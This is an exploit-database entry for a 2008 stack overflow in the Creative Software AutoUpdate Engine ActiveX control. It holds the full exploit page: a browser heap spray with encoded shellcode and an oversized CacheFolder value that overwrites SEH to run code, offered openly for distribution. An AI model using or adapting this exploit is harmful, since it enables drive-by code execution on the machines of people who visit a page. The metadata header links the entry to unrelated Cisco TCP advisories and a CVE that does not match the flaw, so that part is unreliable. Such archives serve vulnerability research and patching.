Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit

vendor:

Creative Software AutoUpdate Engine

by:

BitKrush

9.3

CVSS

HIGH

Stack-Overflow

119

CWE

Product Name: Creative Software AutoUpdate Engine

Affected Version From: Not specified

Affected Version To: Not specified

Patch Exists: YES

Related CWE: CVE-2008-4609

CPE: o:creative_labs:creative_software_autoupdate_engine

Metasploit: https://www.rapid7.com/db/vulnerabilities/cisco-nx-os-cisco-sa-20090908-tcp24/, https://www.rapid7.com/db/vulnerabilities/cisco-sa-20090908-tcp24/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2008

Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit

A stack-based buffer overflow vulnerability exists in the CacheFolder property of the Creative Software AutoUpdate Engine ActiveX control. After 260 bytes, the stack-based buffer overflows and allows code execution reliably at 512 bytes.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

<html>
<!--
!!!NOT PRIVATE PLEASE DISTRIBUTE!!!
Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit by BitKrush <BitKrush +A.T.+ G.M.A.I.L.D.0.T.C.0.M.>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably.
Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital Security
ActiveX Download @ http://www.creative.com/su/Product.asp
MAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATION
Greetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tested On Windows XP SP3 with all patches (like that matters)
Products Affected:
the below Creative Labs Software and Hardware depends on this ActiveX for updates and comes shipped with it or is supported by the control:
Sound cards
Audigy
Audigy 2
Audigy 2 LS
Audigy 2 NX
Audigy 2 Platinum
Audigy 2 Platinum eX
Audigy 2 Value
Audigy 2 ZS
Audigy 2 ZS Gamer
Audigy 2 ZS Notebook
Audigy 2 ZS Platinum
Audigy 2 ZS Platinum Pro
Audigy 2 ZS Video Editor
Audigy 4 Pro
Audigy Gamer
Audigy LS
Audigy MP3+
Audigy Platinum
Audigy Platinum eX
Live! 24-bit
Live! 24-bit External
Live! 5.1
Live! 5.1 Digital (Dell)
Live! ADVANCED MB
MP3 +
Sound Blaster Audigy 2 ZS Digital Audio
Sound Blaster Audigy ADVANCED MB
Sound Blaster X-Fi Fatal1ty
Wireless Music
X-Fi Elite Pro
X-Fi Platinum
X-Fi XtremeMusic

USB Sound Blaster
Audigy 2 NX
MP3 +

Portable Audio
MuVo
MuVo NX
MuVo Slim
MuVo TX
MuVo TX FM
MuVoÂ² X-Trainer
MuVoÂ²
MuVoÂ² FM
NOMAD II 32MB
NOMAD II MG
NOMAD IIc
NOMAD Jukebox 3
NOMAD Jukebox ZEN
Rhomba

Portable Media Players
ZEN Portable Media Center
ZEN Vision 30GB

MP3 Players
MuVo
MuVo 2.0 / MuVo Mix
MuVo Micro
MuVo NX
MuVo Slim
MuVo Sport C100
MuVo TX
MuVo TX FM
MuVo V200
MuVoÂ² X-Trainer
MuVoÂ²
MuVoÂ² FM
NOMAD II 32MB
NOMAD II MG
NOMAD II MG Limited Edition
NOMAD IIc
NOMAD JukeBox
NOMAD Jukebox 10GB
NOMAD Jukebox 2
NOMAD Jukebox 3
NOMAD Jukebox C
NOMAD Jukebox ZEN
NOMAD Jukebox ZEN NX
NOMAD Jukebox ZEN USB 2.0
Rhomba
ZEN 20GB
ZEN Micro
ZEN Nano 512MB
ZEN Nano Plus
ZEN Neeon 5GB/6GB
ZEN Portable Media Center
ZEN Sleek
ZEN Touch
ZEN Vision 30GB
ZEN Xtra

Web Cameras
Creative PC-CAM 900
Creative WebCam Vista
Game Star
Live! Ultra for Notebooks
PC-CAM 880
WebCam Instant
WebCam Instant
WebCam Live!
WebCam Live! Pro
WebCam Live! Ultra
WebCam Notebook
WebCam NX
WebCam NX Pro
WebCam NX Ultra
WebCam Vista

Video
Audigy 2 ZS Video Editor

Wireless
Wireless Music

Notebook Products
Audigy 2 NX
Audigy 2 ZS Notebook
Live! 24-bit External
Live! Ultra for Notebooks
MP3 +
WebCam Notebook

Software
Game Star
http://us.creative.com/support/downloads/popup_supportproducts.asp
Google: http://www.google.com/search?q=0A5FD7C5-A45C-49FC-ADB5-9952547D5715&btnG=Search
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ActiveX CLSID = 0A5FD7C5-A45C-49FC-ADB5-9952547D5715
KILL BIT THIS ^^
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-->

<object classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715' id='obj1'></object>
<script language='javascript'>
var sc01 = unescape("%u9090%u9090"+ //Windows Execute Command (calc)
"%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c");
var mainblk = unescape("%u0c0c%u0c0c");
var hdr = 20;
var slck = hdr + sc01.length;
while (mainblk.length < slck) mainblk += mainblk;
var fillblk = mainblk.substring(0,slck);
var blk = mainblk.substring(0,mainblk.length - slck);
while (blk.length + slck < 0x40000) blk = blk + blk + fillblk;
var memory = new Array();
for (i = 0; i < 400; i++){ memory[i] = blk + sc01 }
var buf = '';
while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here.
obj1.cachefolder = buf;
</script>
</html>

# milw0rm.com [2008-05-27]